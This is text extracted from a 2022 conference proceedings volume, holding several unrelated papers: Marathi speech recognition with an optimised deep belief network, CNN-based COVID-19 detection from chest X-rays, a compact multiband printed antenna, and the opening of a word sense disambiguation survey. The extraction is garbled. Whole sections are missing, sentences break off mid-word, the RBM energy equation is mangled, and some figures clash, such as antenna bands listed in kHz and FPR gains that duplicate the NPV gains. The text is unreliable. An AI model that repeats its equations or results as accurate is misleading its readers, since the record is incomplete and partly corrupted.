https://doi.org/10.1109/ACCESS.2019.2953498
27. Musumeci, F., et al. (2019). An Overview on Application of Machine Learning Techniques in
Optical Networks. IEEE Communication Survey Tutorials, 21(2), 1383–1408. https://doi.org/
10.1109/COMST.2018.2880039
28. Morocho-Cayamcela, M. E., Lee, H., & Lim, W. (2019). Machine learning for 5G/B5G
mobile and wireless communications: Potential, limitations, and future directions. IEEE Access,
7(Sept), 137184–137206. https://doi.org/10.1109/ACCESS.2019.2942390
29. Toscano, M., Grunwald, F., Richart, M., Baliosian, J., Grampín, E., & Castro, A. (2019).
Machine learning aided network slicing. In International Conference on Transparent Optical
Networks (ICTON) (Vol. 2019-July, pp. 8–11, 2019). https://doi.org/10.1109/ICTON.2019.884
0141.
30. Casellas, R., et al. (2018). Enabling data analytics and machine learning for 5G services
within disaggregated multi-layer transport networks. In International Conference on Trans-
parent Optical Networks (ICTON) (vol. 2018-July, pp. 1–4). https://doi.org/10.1109/ICTON.
2018.8473832.
31. Morais, R. M., & Pedro, J. (2018). Machine learning models for estimating quality of trans-
mission in DWDM networks. Journal of Optical Communications and Networking, 10(10),
D84–D99. https://doi.org/10.1364/JOCN.10.000D84
32. Pelekanou, A., Anastasopoulos, M., Tzanakaki, A., & Simeonidou, D. (2018). Provisioning
of 5G services employing machine learning techniques. In 2018 International Conference on
Optical Network Design and Modeling (ONDM) 2018—Proceedings (vol. 1, pp. 200–205)
https://doi.org/10.23919/ONDM.2018.8396131.
Impact of Machine Learning Algorithms on WDM … 663
33. Wang, Y., Zhang, Z., Zhang, S., Cao, S., & Xu, S. (2018). A unified deep learning based
polar-LDPC decoder for 5G communication systems. In 2018 10th International Conferences
of Wireless Communication Signal Process. WCSP 2018 (pp. 1–6). https://doi.org/10.1109/
WCSP.2018.8555891.
34. Fagbohun, O. O. (2014). Comparative studies on 3G,4G and 5G wireless technology. IOSR
Journal Electronics Communication Engineering, 9(2), 133–139. https://doi.org/10.9790/
2834-0925133139
35. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications, 32(20), 16091–16107. https://doi.org/10.1007/
s00521-020-04761-6
36. Rottondi, C., Barletta, L., Giusti, A., & Tornatore, M. (2018). Machine-learning method for
quality of transmission prediction of unestablished lightpaths. Journal of Optical Communi-
cations and Networking, 10(2), A286–A297. https://doi.org/10.1364/JOCN.10.00A286
37. De Miguel, I., et al. (2013). Cognitive dynamic optical networks. In Optical Fiber Communi-
cations Conference and Exposition OFC 2013 (pp. 18–20). https://doi.org/10.1364/ofc.2013.
ow1h.1.
38. Aladin, S., & Tremblay, C. (2018). Cognitive tool for estimating the QoT of new lightpaths.
In 2018 Optical Fiber Communications Conference and Exposition OFC 2018— Proceedings
(Vol. 3, pp. 1–3, 2018). https://doi.org/10.1364/ofc.2018.m3a.3.
39. Shahkarami, S., Musumeci, F., Cugini, F., & Tornatore, M. (2018). Machine-learning-based
soft-failure detection and identification in optical networks. In Optical InfoBase Conference
Papers (Vol. Part F84-O, pp. 37–39). https://doi.org/10.1364/OFC.2018.M3A.5.
Duo Features with
Hybrid-Meta-Heuristic-Deep Belief
Network Based Pattern Recognition for
Marathi Speech Recognition
Abstract Marathi speech recognition is challenging due to the many dialects, vari-
ability in pronunciation, and the limited size of speech corpus available for developing
a speech recognition system. This work addresses the critical issues in developing
a speech recognition system for the Marathi Language. The paper evaluates various
approaches for feature extraction and pattern recognition and proposes optimized
methods for feature extraction and pattern recognition of the Marathi language.
Evaluation is classified into two parts—Feature Extraction Techniques and Pattern
Recognition Techniques. In feature extraction, MFCC and spectral features are eval-
uated, and their results are compared for analysis purposes using six measures. In
pattern recognition, DBN is optimized with different techniques such as WOA, GWO,
CBBO, and ROA and analyzed using six performance measure parameters. Finally,
the duo feature hybrid algorithm for feature extraction and new pattern recognition
approach RCBO-DBN has been proposed, and its performance is compared with
earlier techniques.
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 665
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_53
666 R. P. Bachate et al.
such as the traditional HMM-GMM approach, deep learning approach, and hybrid
approach. Each method has it is own pros and cons in different circumstances. The
languages have spoken by most people in the world benefits from the availability of
a large speech corpus for building a speech recognition system. On the other hand,
languages that belong to a small geographical region or spoken by a small group of
people concerning the population of the world get lesser attention for developing a
speech recognition system. More than 9.5 crore people from India speak the Marathi
language [1]. The Marathi language has a total of 42 dialects spread across mainly
in Maharashtra state and the remaining part of India. Scarce research is done until
now about developing a speech recognition system for the Marathi language.
Deep belief network is a stack of restricted Boltzmann machines (RBMs) consist-
ing of two layers isible layer and hidden layer inside each RBM layer. Unlike deep
neural networks, each layer of RBM learns all the input. The hidden layer of one
layer becomes a visible layer in its next RBM. “An RBM is an undirected energy-
based model with two layers of visible (v) and hidden (h) units, respectively, with
connections only between layers. RBM has two biases—(a) Hidden layer biases that
are used for a forward pass and (b) Visible layer bias that is used for the backward
pass. Each RBM module is trained one at a time in an unsupervised manner and
using contrastive divergence procedure” [2]. RBM is suitable for many applications
such as regression, feature learning, dimensionality reduction, etc. The performance
of DBN depends on the three parameters—(i) number of hidden units, (ii) number of
layers, (iii) number of iterations [3]. The performance of DBN flattens after reach-
ing the threshold number of hidden units. If the number of hidden layers increases,
the performance of DBN is affected badly. But the performance of DBN can be
increased by increasing the training iterations of RBM. The total energy of RBM
with the hidden layer (h) and visible layer (v) is denoted in Eq. (1)
b
B Z E(ca ) = nsa Ba,b + βa (1)
a
This paper is arranged as per the below-mentioned manner: The related work of
existing speech recognition methodologies in Sect. 2. Duo features with Hybrid-
Meta-Heuristic based deep belief network is discussed in Sect. 3. Experimental setup,
Results and performance analysis of various pattern recognition algorithms is spec-
ified in Sect. 4. At last, the conclusion and future scope of the paper is mentioned in
Sect. 5.
2 Related Work
make their life better using NLP, we need to work on regional languages like Marathi,
Hindi, Punjabi, and so on” [4]. Supriya et al. [5] have implemented a Marathi Auto-
matic Speech Recognition System using HMM and DNN. The dataset used for this
implementation is having a size of 15,000 speech files and different 1500 speak-
ers. The proposed system has been implemented using the Kaldi ASR toolkit and
achieved a 24% word error rate. A text corpus of 340 sentences also used, while
performing. Five models—Mono, Tri1, Tri2, Tri3, and SGMM—have been used in
the system for the comparative study purpose, and SGMM gives a better result com-
pared to other models. Kishori et al. [6] have proposed a Marathi ASR system for
isolated words using neural network. The speech corpus used for the implementation
is 100 words of 100 different speakers with three utterances of each word discrete
wavelet transform (DWT) algorithm used in this paper for the feature extraction. For
pattern recognition, artificial neural network (ANN) has been used, which gave 60%
accuracy. Lokesh et al. [7] have come up with bi-directional Recurrent Neural Net-
work for building Tamil automatic speech recognition system. The SGF algorithm
is used for the speech data pre-processing. Feature extraction has been implemented
using MAR and PLP algorithms, and BRNN is used as a classifier. Different classifi-
cation algorithms such as BRNN-SOM, RNN, and DNN-HMM were implemented
and analyzed for the performance measurement. The proposed system has achieved
the 93.6% accuracy, which is better compared to other classifiers. Sangramsingh [8]
implemented Marathi speech recognition using the HTK toolkit. Here, MFCC is
used for the feature extraction and HMM for the classification purpose. With this,
5.37% of Word Error Rate and 94.63% of accuracy is achieved. The dataset used for
the implementation purpose is minimal, i.e., 30 words and eight different speakers.
Puneet et al. [9] developed a Punjabi ASR system for mobile phones. The MFCC
algorithm is used for feature extraction, and the GMM is used as a pattern recogni-
tion technique. The 6.34 h speech corpus data set has been used, having 48 distinct
speakers.This speech corpus contains 1275 words. The system gives the highest
accuracy for a higher level of GMM, i.e., 64. The GMM-CD Untied gave the highest
accuracy of 81.2%. Ravindra and Ashok [10] discussed various approaches used for
pattern recognition. In this paper, building speech recognition system performance
of different classifiers is discussed, such as KNN, SVM, NN, DNN, and DBN. After
implementing and analyzing the results of these algorithms, it is found that DBN
gives better results as compared to other classifier algorithms.
668 R. P. Bachate et al.
The Grey Wolf Optimizer algorithm is proposed by Mirjalili et al. [11] in 2016. The
design of this algorithm is based on the nature scenario, i.e., survival of fittest. The
organisms in nature evolve with heredity, selection, and mutation. There are changes
in the searching process of wolves based on heredity, selection, and mutation. There
are four phases of wolves hunting –(i)searching for prey, (ii)encircling prey, (iii)
hunting, and (iv) attacking target [12]. “After each iteration of the algorithm sort the
fitness value that corresponds to each wolf by ascending order, and then eliminate R
wolves with worst fitness value, meanwhile randomly generate wolves equal to the
number of eliminated wolves”.
The inspiration to design the Whale Optimization Algorithm is taken from Whale
fish, which is the biggest mammal in the world. The whale has seven different species
in which humpback is considered here to design the Whale Optimization Algorithm.
The unique behavior of bubble-net feeding, which is observed only in humpback
whales, is used to develop the algorithm [12]. This algorithm has involved three
phases—(i) Encircling prey, (ii) Bubble-net attacking, and (iii) Search for prey.
“WOA is a simple, robust, and swarm-based stochastic optimization algorithm.
Population-based WOA can avoid local optima and get a globally optimal solution”
[13].
The Rider Optimization Algorithm (ROA) is inspired by the group of Riders who
wants to reach its target location and become a winner [15]. There are four types of
Riders—(i) Bypass Rider, (ii) Follower, (iii) Overtaker, and (iv) Attacker. Each rider
has its nature and strategy to reach the destination. The bypass rider skips the leading
path to reach the destination. In simple words, it does not follow the leading rider
and choose its path by own. The follower group of riders supports the leading rider.
The overtaker rider follows his path concerning leading rider to reach the destination.
The attacker rider is a type of rider that uses the maximum speech to reach a target
location. ROA algorithm is used for obtaining the optimal weights in the neural
network.
The proposed Duo features with hybrid meta heuristic-based deep belief network is
divided into three parts—Speech corpus pre-processing by implementing smoothing
technique, feature extraction using duo features, which is a new proposed feature
extraction methodology, and the classification that has been implemented with new
proposed hybrid algorithm RCBO-DBN. The proposed model is shown in Fig. 1.
The feature extraction phase plays a vital role in the speech recognition system.
Because, the performance of the classifier depends on the accuracy and qual-
The results of various optimized-DBN and proposed RCBO are given in Table 2. The
first positive measure used for analysis is accuracy. The proposed algorithm gives
an accuracy of 71.5%, which is higher than 2.11% than GWO-DBN, 8.84% than
WOA-DBN, 8.46% than CBBO-DBN, and 9.82% than ROA-DBN. The precision
values of proposed optimized DBN give advancement of 0.22 % than GWO-DBN,
1.22% than WOA-DBN, 1.1% than CBBO-DBN, and 1.28% than ROA-DBN. The
Negative Predictive Value is another positive measure used for performance analy-
sis. The RCBO-DBN performs well compare to conventional optimized algorithms
and give advancement of 0.41% than GWO-DBN, 7.27% than WOA-DBN, 6.91%
than CBBO-DBN, and 8.29% than ROA-DBN. The first negative measure consid-
ered here is the FPR, whose values are mentioned in Table 2. It gives betterment in
around 0.41% than GWO-DBN, 7.27% than WOA-DBN, 6.91% than CBBO-DBN,
672 R. P. Bachate et al.
and 8.29% than ROA-DBN. Another negative measure used here for performance
analysis is FNR. The FNR results of the proposed feature extraction technique are
given in Table 2. The results are good with respect to other conventional optimized
algorithms. The proposed technique provides an advancement with of 2.43% than
GWO-DBN, 2.02% than WOA-DBN, 0.54% than CBBO-DBN, and 0.81% than
ROA-DBN. The last negative measure used here for performance analysis is FDR.
The proposed approach provides an advancement with 0.97% than GWO-DBN,
2.36% than WOA-DBN, 0.54% than CBBO-DBN, and 1.69% than ROA-DBN.
5 Conclusion
This paper has proposed a novel approach feature extraction and pattern recognition
for Marathi speech recognition system. For the experiment purpose, studied related
work in the speech domain for Marathi as well as other Indic and non-Indic languages.
Here, the optimal features were selected by using a proposed duo-feature feature
extraction technique. After performance analysis, it was observed that duo-feature
performs better with the advantage of 12.7% than MFCC and 13% than Spectral
features. The pattern recognition has been achieved with proposed RCBO-DBN and
other conventional optimized DBN techniques. The proposed optimization technique
gives the advantage of 2.11% than GWO-DBN, 8.84% than WOA-DBN, 8.46% than
CBBO-DBN, and 9.82% than ROA-DBN.The future work focuses on implementing
RNN, LSTM, and comparing the results with proposed RCBO-DBN.
References
1. Eberhard, C. D. F., & David M., Simons, G. F. Ethnologue: Languages of the World. SIL
International. [Online]. Available: https://www.ethnologue.com/language/mar.
2. Morabito, F. C., Campolo, M., Ieracitano, C., & Mammone, N. (2018). Deep learning
approaches to electrophysiological multivariate time-series analysis. Elsevier Inc.
Duo Features with Hybrid-Meta-Heuristic-Deep Belief … 673
3. Salama, M. A., Hassanien, A. E., & Fahmy, A. A. (2011). Deep belief network for clustering and
classification of a continuous data. In 10th IEEE International Symposium on Signal Processing
and Information Technology, p. 24.
4. Bachate, R. P. & Sharma, A. (2020). Acquaintance with natural language processing for building
smart society. In E3S Web Conference, 170, 02006.
5. Paulose, S. Nath, S. & Samudravijaya, K. (2018). Marathi speech recognition. In The 6th
International Workshop on Spoken Language Technologies for Under-Resourced Languages
29-31 August 2018 (Vol. August, pp. 235–238). Gurugram, India .
6. Ghule, K. R., & Deshmukh, R. R. (2015). Automatic speech recognition of marathi isolated
words using neural network, 6(5), 4296–4298.
7. Lokesh, S., Malarvizhi Kumar, P., Ramya Devi, M., Parthasarathy, P., & Gokulnath, C. (2019).
An automatic tamil speech recognition system by using bidirectional recurrent neural network
with self-organizing map. Neural Computing and Applications, 31(5), 1521–1531.
8. Sangramsing, K. (2015, December). Marathi speech recognition system using hidden markov
model toolkit. Concurrent Engineering Research and Applications, 5(12).
9. Mittal, P., & Singh, N. (2019). Development and analysis of Punjabi ASR system for mobile
phones under different acoustic models. International Journal of Speech Technology, 22(1),
219–230.
10. Bachate, R. P., & Sharma, A. (2020). Comparing different pattern recognition approaches of
building Marathi ASR system. International Journal of Advanced Science and Technology,
29(5), 4615–4623.
11. Pradhan, M., Roy, P. K., & Pal, T. (2018). Oppositional based grey wolf optimization algorithm
for economic dispatch problem of power system. Ain Shams Engineering Journal, 9(4), 2015–
2025.
12. Mirjalili, S., & Lewis, A. (2016). The whale optimization algorithm. Advances in Engineering
Software, 95, 51–67.
13. Nasiri, J., & Khiyabani, F. M. (2018). A whale optimization algorithm (WOA) approach for
clustering. Cogent Mathematics and Statistics, 5(1), 1–13.
14. Saremi, S., Mirjalili, S., & Lewis, A. (2014). Biogeography-based optimization with chaos.
Neural Computing and Applications, 25(5), 1077–1097.
15. Binu, D., & Kariyappa, B. S. (2019). RideNN: A new rider optimization algorithm-based
neural network for fault diagnosis in analog circuits. IEEE Transactions on Instrumentation
and Measurement, 68(1), 2–26.
Computer-Aided Diagnostic
of COVID-19 Using Chest X-Ray
Analysis
1 Introduction
The COVID-19 infectious disease that has spread in more than 210 countries and
destroyed greater lives is becoming pandemic. The COVID-19 pandemic had taken a
massive toll on people all over the globe. The risk of pneumonia suffered by patients
with COVID-19 is immense for many, especially in age groups above sixty and people
suffers from other diseases. Coronaviruses are essential pathogenic to humans and
animals. At present, the novel COVID-19 is growing at an alarming rate all over the
world and poses a threat to the survival of billions of humans. While chest CT is said
to be a successful imaging procedure for the treatment of lung-related illness, chest
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 675
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_54
676 M. Shetty and S. Shetty
X-ray is popular more commonly due to its shorter imaging time and significantly less
costly than CT. Deep learning, one of the most common AI methods, is an excellent
means of tools and algorithms to improve human life. Detection of disorders through
X-ray images is a problem that needs a better solution. In fact, the number of CXRs
to be investigated is vast, and well beyond the ability of medical staff, particularly in
developing countries. A computer-aided diagnostic program will mark prospective
areas on CXR for doctors to closely inspect and alert in situations where immediate
treatment is required. One of the main tasks in developing CAD functionality is to
detect and identify disease from CXRs automatically. Helping radiologists to examine
the massive quantities of X-ray images which would be crucial to successful and
accurate COVID-19 examination. The primary aim of technology is to develop tools
and algorithms to improve human life. Detection of disorders through X-ray images
is a problem that needs a better solution. The number of CXRs to be investigated is
vast, and well beyond the ability of medical staff, particularly in developing countries.
A computer-aided diagnostic (CAD) program will mark prospective areas on CXR
for doctors to closely inspect and alert in situations where immediate treatment is
required. The key aim of the proposed experiment is to increase the efficiency and
performance of the duty of radiologists by developing a computational framework
for the identification and classification of COVID-19 diseases. Our studies were
centered on a collection of chest X-ray images named metadata.csv collected at the
University of Montreal by Dr Joseph Cohen postdoctoral fellow [1]. Experimental
findings indicate that the system built here can accurately detect 98.00% COVID-19
cases.
2 Survey of Literature
3 Proposed System
validation, the original data category was changed. We just reorganized all of the data
into training and validation collection. The training set was assigned 80% images,
and the test set was given 20% images to boost evaluation accuracy. We used many
methods of data enhancement to artificially increase dataset size, and efficiency is
method helps solve overfitting issues and increases the potential to generalize the
system while training. The framework given in Figure 3 is composed of the combined
layers of classification, convolution, and max-pooling. The extractors of the feature
Computer-Aided Diagnostic of COVID-19 Using Chest X-Ray Analysis 679
include conv 3 × 3, 32, conv 3 × 3, 64, conv 3 × 3, 128, conv 3 × 3, 128, max-
pooling layer of size 2 × 2, and a ReLU activator between them. The performance
of the convolution and max-pooling activities is organized into 2D planes named
feature maps, and we got 208 × 208 × 32, 102 × 102 × 62, 49 × 49 × 128, and
22 × 22 × 128 sizes of feature maps, for the convolution operations and 104 ×
104 × 32, 51 × 51 × 64, 24 × 24 × 128 and 11 × 11 × 128 sizes of feature
maps obtained through pooling operation, respectively, with an input of image of
size 224 × 224 × 3. It is worth noting that every plane of a level in the network was
achieved by combining one or several previous level planes. The classifier is located
toward the far side of the proposed system of the convolution neural network (CNN).
This is essentially an artificial neural network (ANN) and is also called a dense
layer. This classifier uses specific feature variables (vectors) as any other classifier
to conduct classification. So, the extracted features (CNN part) for the classifiers
are transformed into a one-dimensional vector function. This system is termed as
flattening, in which result obtained from convolution function is flattened to produce
one long characteristic function for use in the final classification process by the dense
layer. Main components of the classification layer are a dropout od size 0.5, two dense
layers, a flattened layer, a RELU between the two dense layers and a sigmoid to do
the activation task which does the classification work.
pattern testing for radiological evidence from COVID-19 positive people and non-
COVID-19 people in various places around the globe. For every patient, the dataset
includes details such as age, location, physicians’ remarks. So, the results of the
classification analyzed with the help of dataset and results are in good agreement with
dataset information. We have obtained 99.00% sensitivity and 80.00% specificity.
These results imply that COVID-19 is identified accurately, but non-COVID-19 cases
accuracy is 80.00% given in Table 1, and the graph shows training and validation
accuracy and loss. Since the true negative rate is not satisfactory, we will overcome
this in our future research with a large dataset.
5 Conclusion
We have shown how a series of chest X-ray images will recognize positive COVID-
19 results. We are performing this experiment from scratch, which distinguishes it
from the processes which depend strongly on transfer learning. This research is to
Computer-Aided Diagnostic of COVID-19 Using Chest X-Ray Analysis 681
be expanded in future to identify and classify COVID-19 images present in the large
X-ray image dataset. Differentiating X-ray pictures which shows COVID-19 related
pneumonia and non-COVID-19 pneumonia has been a big issue. Our next approach
will tackle this problem.
References
1. Cohen, J. P., Morrison, P., Dao, L., Roth, K., Duong, T. Q., & Ghassemi, M. (2020). Covid-
19 image data collection: Prospective pre-dictions are the future. arXiv preprint arXiv:2006.
11988.
2. Brunetti, A., Carnimeo, L., Trotta, G. F., & Bevilacqua, V. (2019). Computer-assisted frame-
works for classification of liver, breast and blood neoplasias via neural networks: A survey
based on medical images. Neurocomputing, 335, 274–298.
3. Litjens, G., Kooi, T., Bejnordi, B. E., Setio, A. A. A., Ciompi, F., Ghafoorian, M., Van Der
Laak, J. A., Van Ginneken, B., & Sánchez, C. I. (2017). A survey on deep learning in medical
image analysis. Medical Image Analysis, 42, 60–88.
4. Asiri, N., Hussain, M., Al Adel, F., & Alzaidi, N. (2019). Deep learning based computer-aided
diagnosis systems for diabetic retinopathy-a survey. Artificial Intelligence in Medicine.
5. Zhou, T., Thung, K.-H., Zhu, X., & Shen, D. (2019). Effective feature learning and fusion
of multimodality data using stage-wise deep neural network for dementia diagnosis. Human
Brain Mapping, 40(3), 1001–1016. https://doi.org/10.1002/hbm.24428
6. Shickel, B., Tighe, P. J., Bihorac, A., & Rashidi, P. (2017). Deep EHR: a survey of recent
advances in deep learning techniques for electronic health record (EHR) analysis. IEEE Journal
of Biomedical and Health Informatics, 22(5), 1589–1604. https://doi.org/10.1109/JBHI.2017.
2767063 arXiv:1706.03446.
7. Jacobi, A., Chung, M., Bernheim, A., & Eber, C. (2020). Portable chest x-ray in coronavirus
disease-19 (covid-19): A pictorial review. Clinical Imaging.
8. Wang, S., & Summers, R. M. (2012). Machine learning and radiology. Medical Image Analysis,
16(5), 933–951.
9. Ker, J., Wang, L., Rao, J., & Lim, T. (2017). Deep learning applications in medical image
analysis. IEEE Access, 6, 9375–9389.
10. Mittal, A., Hooda, R., & Sofat, S. (2017). Lung field segmentation in chest radiographs: A
historical review, current status, and expectations from deep learning. IET Image Processing,
11, 937–952. https://doi.org/10.1049/iet-ipr.2016.0526
11. Bar, Y., Diamant, I., Wolf, L., Lieberman, S., Konen, E., & Greenspan, H. (2018). Chest
pathology identification using deep feature selection with non-medical training. Computer
Methods in Biomechanics and Biomedical Engineering: Imaging & Visualization, 6(3), 259–
263.
Low Cost Compact Multiband Printed
Antenna for Wireless Communication
Systems
Abstract The proposed approach aims to design the compact multiband printed
antenna for in applications of wireless communication. The basic aim of the design
of this antenna is to achieve wide bandwidth, less weight, and decreased size which
reduces cost as well. The structure includes a main radiator, two sub-patches, and
the ground plane which generates bands at 1.25, 1.75, 2.45, 3.95, 5.1 GHz with
multiple frequency that have bandwidth of 45, 68, 112, 127, 240 kHz, respectively.
The defected ground structure (DGS) has been used for the improvement of the
parameters of proposed antenna. The simulated and fabricated result exhibits good
reflection coefficient, radiation pattern, and stable gain so this antenna is applicable
for DCS/Bluetooth /WLAN/WiMAX/IMT bands. This proposed antenna is designed
and analyzed using Ansys HFSS 11.2 for high frequency structure simulation tool.
The method used to fabricate simulated antenna, and this photolithographic and
vector network analyzer are used to measure the fabricated result. The proposed
antenna shows the better consensus between both the results. The proposed antenna
works at the multiple frequency which varies from bands from 1.25 to 5.1 GHz for
the Bluetooth system, 2.12–2.45 GHz for the WLAN systems, 3.45–3.95 GHz for
the WiMAX system, and 4.95–5.1 GHz for the IMT system.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 683
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_55
684 R. Prabha et al.
1 Introduction
Patch antenna is used for the narrow bandwidth which can be used in advancement
of wireless application. These antennas are low key inexpensive and easy to manu-
facture by utilizing advanced printed circuit technology. They are adaptable with
regard to impedance, resonant frequency, and polarization with one specific mode
are chosen [1]. In [2, 3], a dipole antenna is used to design the different frequency band
antenna. Significance of different shape of slots with a used mobile communications
[4, 5] and different Quasi-Yagi antenna has been used in wireless communications
because of its broadband characteristic and good radiation performance and provide
acceptable absolute gain (0–4.4 dBi) [6]. Different methods have been proposed to
achieve the application of wireless communications using U and L slots [5, 7]. The
achievement of omnidirectional radiation pattern and sustainable antenna gain is
done over the operating bands [8, 9]. The proposed methods have been used for wide
bandwidth [10]. The method of defected ground structure (DGS) has been proved to
be very easy and usable for achieving additional resonant and bandwidth enhance-
ment whereas remove the differently generated frequency [11, 12]. Other practical
approach considered has been involved to elevate the transmission capacity of the
antenna. A thicker substrate may be used as a substitute, but it will result in increasing
the number of energy confined in the substrate [13]. Thus, different method has been
used to achieve the multiband antenna for a particular resonant frequency.
This paper presents the multiband antenna generates the different frequency bands
as DCS (1710–1880 MHz), IEEE802.11b&g WLAN (2.45–2.54 GHz), WiMAX
(3.25–3.95 GHz), IEEE 802.11a WLAN, and IMT (5.1–5.95 GHz) with a simple
design of dual patch, L slots and changed in the ground structure is used to gener-
ated multiband and compactness characteristics. Defected ground structure and
circular slot are used for the improvement of proposed frequency, radiation pattern,
and return loss of presented antenna. The simulation process and fabricated result
show that the effects of the designed antenna are adequate, and it fits for wireless
communications systems. The configuration and data simulation are discussed in
Sects. 2 and 3 as well as the parameters of antenna is carefully examined in this
sections and in Sect. 4 clearly differentiate between the fabricated data and simu-
lated results which satisfies the following operational bands such as DCS/Bluetooth
/WLAN/WiMAX/IMT bands. This further study include the changes in antenna
reconfigurable use of varactor diode, and this single antenna will applicable for
various applications without altering major changes. The enhancement of the gain,
bandwidth and various parameters using Defected Ground Structure (DGS) and also
quell the surface wave propagation. These antennas can work over a compact broad
frequency range.
Low Cost Compact Multiband Printed Antenna … 685
The structure of simulated antenna that have two patch elements and worked at
1.25, 1.75, 2.45, 3.39, 5.1 GHz frequency bands is presented in Fig. 1a, b. The
influenced current distribution. It may also affect the propagation and stimulation of
electromagnetic waves through the substrate layer [12].
Fig. 2b Radiation pattern at various frequency of simulated antenna (a)1.25 GHz (b)1.73 GHz
(c)2.45 GHz (d)3.9 GHz (e) 5.1 GHz [2]
Low Cost Compact Multiband Printed Antenna … 689
Fig. 2c Simulated gain graph at various frequency of simulated antenna. (a) 1.25 GHz (b) 1.73 GHz
(c) 2.45 GHz (d) 3.9GH (e) 5.1 GHz [2]
is between 2 and 4 dB for multiple bands which is shown in Fig. 2(b). The loss induced
in the FR-4 material is due to variation in the higher resonating frequency.
Simulated Gain
The antenna gain is one of the important parameter to examine the ability of antenna
to radiate more or less in any direction. In this design, the improvement of the
antenna gain is results due to defected ground structure and various slots in antenna.
The proposed antenna provides a gain of −5.27 dB at 1.25 GHz, 2.60 dB at 1.75
GHz, 1.31 dB at 2.5 GHz, 0.377 dB at 3.95 GHz, −0.1419 dB at 5.1 GHz. The
second important parameter of antenna its efficiency which show the how efficient
the antenna works (Fig. 2(c)).
The presented antenna has different slots and DGS covering the DCS, Bluetooth,
WLAN, WiMAX, IMT. The main structure of designed of top and bottom outlook
of simulated antenna is presented in Fig. 3. L slot and I slot are etched of fabricated
antenna is presented in top and bottom outlook of the fabricated antenna restrain H
shape DGS which shown in figure below. This fabricated structure is very exact view
of the simulated diagram of proposed antenna. This fabricated multiband antenna is
very useful for wireless communication systems. This antenna is also tested using
VNA, and this antenna is also measured with frequency range of 1–6 GHz. Table 4
shows the simulated and fabricated results which differentiate the basic parameters
of simulated and fabricated results.
690 R. Prabha et al.
5 Conclusion
This paper presented the design of compact wideband and multiple band antenna
for the wireless communication systems such as DCS, Bluetooth, WLAN, WiMAX,
IMT bands. The multiband frequency can be individually controlled using the L slots,
I slots, and defected ground structure without influencing the wideband performance.
However, the result of proposed antenna manifest the better performance with regard
to return loss, radiation pattern, gain, and efficiency. The primary features of presented
multiband antenna includes low profile, light weight, and simple to fabricate the
design considering future smaller wireless communications systems. The description
of procedure to designed antenna has been presented in detail. The inclusion of
varactor or tunnel diode to the design of antenna made it reconfigurable which enabled
the various five bands that are independently tuned and electrically connected over
the broad frequency range. Proposed design has been measured and fabricated. The
comparison of measured and simulated results has better association of each other.
Low Cost Compact Multiband Printed Antenna … 691
References
1. Liu, W.-C., Wu, C.-M., & Dai, Y. (2011). Design of triple-frequency microstrip-fed monopole
antenna using defected ground structure. IEEE Transactions on Antennas and Propagation,
59(7).
2. Prabha, R., Tripathi, G. S., & Verma, S. (2016). Design of compact wideband and multi-
band antenna for wireless communication systems. In International conference on advances
in computing, control and communication technology in University of Allahabad, pp 79–85.
3. Abutarboush, H. F., Nilavalan, R., Cheung, S. W., et al. (2012). A reconfigurable wideband and
multiband antenna using dual-patch elements for compact wireless devices. IEEE Transactions
on Antennas and Propagation, 60(1).
4. Lee, Y.-C., & Sun, J.-S. (2009). A new printed antenna for multiband wireless applications.
IEEE Antennas and Wireless Propagation Letters, 8.
5. Huang, C.-Y., & Yu, E.-Z. (2011). A slot-monopole antenna for dual-band WLAN applications.
IEEE Antennas and Wireless Propagation Letters, 10.
6. Wu, Z., Li, L., Chen, X., & Li, K. Dual-band antenna integrating with rectangular mushroom-
like superstrate for WLAN applications. IEEE Antennas and Wireless Propagation Letters.
https://doi.org/10.1109/LAWP.2015.2504558.
7. Yu, Y.-C., & Tarng, J.-H. (2009). A novel modified multiband planar inverted-F antenna. IEEE
Antennas and Wireless Propagation Letters, 8.
8. Moosazadeh, M., & Kharkovsky, S. (2014). Compact and small planar monopole antenna with
symmetrical L- and U-shaped slots for WLAN/WiMAX applications. IEEE Antennas Wireless
Propagation Letters, 13, 388–391.
9. Chen, H., Yang, X., Yin, Y. Z., Fan, S. T., & Wu, J. J. (2013). Triband planar monopole antenna
with compact radiator for WLAN/WiMAX applications. IEEE Antennas Wireless Propagation
Letters, 12, 1440–1443.
10. Li, B., Hong, J., & Wang, B. (2012). Switched band-notched UWB/dual-band WLAN slot
antenna with inverted S-shaped slots. IEEE Antennas and Wireless Propagation Letters, 11.
11. Moosazadeh, M., & Kharkovsky, S. (2014). Compact and small planar monopole antenna with
symmetrical L- and U shaped slots for WLAN/WiMAX applications. IEEE Antennas and
Wireless Propagation Letters, 13.
12. Colburn, J. S., & Rahmat-Samii, Y. (1999). Patch antennas on externally perforated high
dielectric constant substrates. IEEE Transactions on Antennas and Propagation, 47(12).
13. Kumar, C., & Guha, D. (2012). Nature of cross-polarized radiations from probe-fed circular
microstrip antennas and their suppression using different geometries of defected ground
structure (DGS). IEEE Transactions on Antennas and Propagation, 60(1).
14. Abutarboush, H. F., Nilavalan, R., & Nasr, K. M. (2012). Compact printed multiband antenna
with independent setting suitable for fixed and reconfigurable wireless communication systems.
IEEE Transactions on Antennas and Propagation, 60(8).
A Detailed Analysis of Word Sense
Disambiguation Algorithms
and Approaches for Indian Languages
1 Introduction
Worldwide in all chief languages, there are countless vocabularies that have separate
denotations in various frameworks. These words are mentioned to as “ambiguous
words” and existence of these words is referred to as “ambiguity.” Almost all
natural languages continue to suffer from different kinds of ambiguities. The English
do not have any justification for those words. To translate from English to other
languages and languages into English, these ambiguous words should be disam-
biguated correctly for the relevant translation into the target language. Disambigua-
tion of the senses is the process that resolves the problem of ambiguity. Therefore,
